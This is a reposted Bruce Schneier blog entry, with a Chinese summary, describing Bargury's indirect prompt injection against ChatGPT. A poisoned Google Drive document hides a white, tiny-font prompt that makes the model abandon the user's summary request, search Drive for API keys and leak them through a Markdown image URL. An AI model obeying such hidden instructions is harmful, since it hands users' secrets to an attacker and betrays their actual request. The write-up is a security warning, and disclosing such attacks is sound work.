We Are Still Unable to Secure LLMs from Malicious Inputs
Bargury发现一种间接提示注入攻击方式:通过在Google Drive中分享伪装成官方文档的中毒文件,在文档中隐藏恶意提示(白底小字体),诱导ChatGPT执行恶意操作(如搜索API密钥并发送到外部服务器)。这种攻击利用LLM特性绕过检测,凸显AI安全风险。 2025-8-27 11:7:59 Author: www.schneier.com(查看原文) 阅读量:9 收藏

Nice indirect prompt injection attack:

Bargury’s attack starts with a poisoned document, which is shared to a potential victim’s Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) It looks like an official document on company meeting policies. But inside the document, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.

In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to “summarize my last meeting with Sam,” referencing a set of notes with OpenAI CEO Sam Altman. (The examples in the attack are fictitious.) Instead, the hidden prompt tells the LLM that there was a “mistake” and the document doesn’t actually need to be summarized. The prompt says the person is actually a “developer racing against a deadline” and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.

That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt’s instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

This kind of thing should make everybody stop and really think before deploying any AI agents. We simply don’t know to defend against the attack.

Tags: , ,

Posted on August 27, 2025 at 7:07 AM1 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.


文章来源: https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html
如有侵权请联系:admin#unsafe.sh